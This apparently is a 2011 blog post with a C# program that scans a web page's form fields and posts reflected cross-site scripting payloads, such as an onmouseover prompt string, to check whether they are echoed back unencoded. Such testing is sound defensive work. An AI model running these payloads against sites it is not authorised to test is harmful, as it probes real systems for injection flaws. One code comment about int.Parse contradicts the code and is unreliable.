Wednesday, November 16, 2011

Prevent Code injection

using System;
using System.Collections;
using System.Collections.Generic;
using System.IO;
using System.Text;
using System.Net;
using System.Net.Sockets;

namespace sqlInjection
{
class Program
{
// Outbound proxy settings used for both requests in Main.
// Main passes proxy and port to WebProxy (port goes through int.Parse) and
// user/pass to NetworkCredential as the proxy credentials.
// NOTE(review): with port left empty, int.Parse(port) throws FormatException
// before any request is sent, so all four values must be filled in as written.
// NOTE(review): keep real proxy credentials out of source control; load them
// from configuration or the environment instead of committing them here.
private static string proxy = "";
private static string port = "";
private static string user = @"";
private static string pass = "";


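/// <summary>
/// Collects the value of the <c>name</c> attribute of every tag in
/// <paramref name="htmlContent"/> that starts with <paramref name="component"/>
/// (for example the opening of an input or select element).
/// </summary>
/// <param name="htmlContent">Markup to scan. Null or empty yields no results.</param>
/// <param name="component">Tag opening to look for, matched case-insensitively.</param>
/// <param name="httpControls">List that receives one entry per named tag found.</param>
/// <remarks>
/// This is a lightweight text scan, not an HTML parser: a tag is taken to end at
/// the first '>' after its opening, so a '>' inside an attribute value cuts the
/// tag short. Tags without a name attribute are skipped.
/// </remarks>
private static void SearchComponents(string htmlContent, string component, List<string> httpControls)
{
    if (string.IsNullOrEmpty(htmlContent) || string.IsNullOrEmpty(component) || httpControls == null)
    {
        return;
    }

    int searchFrom = 0;
    while (searchFrom < htmlContent.Length)
    {
        // IndexOf returns -1 when nothing is left; index 0 is a valid hit.
        int tagStart = htmlContent.IndexOf(component, searchFrom, StringComparison.OrdinalIgnoreCase);
        if (tagStart < 0)
        {
            break;
        }

        // Confine the attribute search to this tag so a "name" that belongs to
        // a later element (or to page text) is never picked up by mistake.
        int tagEnd = htmlContent.IndexOf('>', tagStart);
        if (tagEnd < 0)
        {
            tagEnd = htmlContent.Length;
        }

        string controlName = ReadNameAttribute(htmlContent, tagStart + component.Length, tagEnd);
        if (controlName.Length > 0)
        {
            httpControls.Add(controlName);
        }

        searchFrom = tagStart + component.Length;
    }
}

// Returns the value of the name attribute found in html[from, tagEnd), or "" when the tag has none.
private static string ReadNameAttribute(string html, int from, int tagEnd)
{
    int cursor = from;
    while (cursor < tagEnd)
    {
        int nameAt = html.IndexOf("name", cursor, tagEnd - cursor, StringComparison.OrdinalIgnoreCase);
        if (nameAt < 0)
        {
            return string.Empty;
        }

        cursor = nameAt + 4;

        // Only accept a standalone attribute: preceded by whitespace, so that
        // "classname=" or "data-name=" are not mistaken for it.
        if (nameAt == 0 || !char.IsWhiteSpace(html[nameAt - 1]))
        {
            continue;
        }

        int valueAt = cursor;
        while (valueAt < tagEnd && char.IsWhiteSpace(html[valueAt]))
        {
            valueAt++;
        }

        if (valueAt >= tagEnd || html[valueAt] != '=')
        {
            continue;
        }

        valueAt++;
        while (valueAt < tagEnd && char.IsWhiteSpace(html[valueAt]))
        {
            valueAt++;
        }

        if (valueAt >= tagEnd)
        {
            return string.Empty;
        }

        char opening = html[valueAt];
        int valueEnd;
        if (opening == '"' || opening == '\'')
        {
            // Quoted value: runs to the matching quote (or to the end of the tag).
            valueAt++;
            valueEnd = html.IndexOf(opening, valueAt, tagEnd - valueAt);
            if (valueEnd < 0)
            {
                valueEnd = tagEnd;
            }
        }
        else
        {
            // Unquoted value: runs to the next whitespace or the end of the tag.
            valueEnd = valueAt;
            while (valueEnd < tagEnd && !char.IsWhiteSpace(html[valueEnd]))
            {
                valueEnd++;
            }

            // Drop the slash of a self-closing tag such as name=foo/>.
            if (valueEnd == tagEnd && valueEnd > valueAt && html[valueEnd - 1] == '/')
            {
                valueEnd--;
            }
        }

        return html.Substring(valueAt, valueEnd - valueAt);
    }

    return string.Empty;
}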

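/// <summary>
/// Checks whether the page at <c>link</c> echoes submitted form values back
/// into its response without HTML-encoding them.
/// </summary>
/// <remarks>
/// The page is fetched once to list its named input and select fields, then every
/// field is posted back with the same marker value. "Injection " is printed only
/// when the marker comes back with its leading double quote intact. A response
/// that contains the marker with the quote encoded (for example as an HTML
/// entity) is the correctly encoded case and is not reported.
/// </remarks>
static void Main(string[] args)
{
    string link = "http://site.com";

    /*
    string injection = "1%3cScRiPt%20%3eprompt%28944524%29%3c%2fScRiPt%3e";
    string injectionVerif = "prompt(";
    */
    string injection = @"%22onmouseover=prompt(963103)%3E";
    string injectionVerif = "onmouseover=prompt(";

    // First request: an empty form post, used only to obtain the page markup.
    string htmlContent;
    using (WebResponse response = BuildFormPost(link, "").GetResponse())
    {
        Console.WriteLine(((HttpWebResponse)response).StatusDescription);
        htmlContent = ReadBody(response);
    }

    // The listing showed these as "< select" / "< input"; the space looks like
    // an artifact of publishing the code as HTML and would never match real markup.
    List<string> listHTMLComponents = new List<string>();
    listHTMLComponents.Add("<select");
    listHTMLComponents.Add("<input");

    List<string> httpControls = new List<string>();
    foreach (string searchComponent in listHTMLComponents)
    {
        SearchComponents(htmlContent, searchComponent, httpControls);
    }

    // Field names come from the page, so they are form-encoded before use.
    // The marker value is already percent-encoded and is sent as written.
    List<string> pairs = new List<string>();
    foreach (string control in httpControls)
    {
        if (string.IsNullOrEmpty(control))
        {
            continue;
        }

        pairs.Add(Uri.EscapeDataString(control) + "=" + injection);
    }

    if (pairs.Count == 0)
    {
        Console.WriteLine("No named form fields found");
        return;
    }

    string postData = string.Join("&", pairs.ToArray());

    using (WebResponse response = BuildFormPost(link, postData).GetResponse())
    {
        htmlContent = ReadBody(response);
    }

    // Requiring the literal quote avoids flagging output that was encoded
    // correctly: an encoded echo still contains the bare marker text.
    string unencodedMarker = "\"" + injectionVerif;
    if (htmlContent.Contains(unencodedMarker))
    {
        Console.WriteLine("Injection ");
    }
}

// Creates a form-encoded POST to link, applies the proxy settings when they are configured, and writes postData as the body.
private static WebRequest BuildFormPost(string link, string postData)
{
    WebRequest request = WebRequest.Create(link);
    request.Method = "POST";
    request.ContentType = "application/x-www-form-urlencoded";

    // The proxy is optional: unset or unparsable settings leave the default
    // in place instead of failing in int.Parse before anything is sent.
    int proxyPort;
    if (!string.IsNullOrEmpty(proxy) && int.TryParse(port, out proxyPort))
    {
        WebProxy webProxy = new WebProxy(proxy, proxyPort);
        webProxy.Credentials = new NetworkCredential(user, pass);
        request.Proxy = webProxy;
    }

    byte[] body = Encoding.UTF8.GetBytes(postData);
    request.ContentLength = body.Length;
    using (Stream requestStream = request.GetRequestStream())
    {
        requestStream.Write(body, 0, body.Length);
    }

    return request;
}

// Reads the whole response body as text and releases the stream and reader even if reading fails.
private static string ReadBody(WebResponse response)
{
    using (Stream responseStream = response.GetResponseStream())
    using (StreamReader reader = new StreamReader(responseStream))
    {
        return reader.ReadToEnd();
    }
}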



}

}
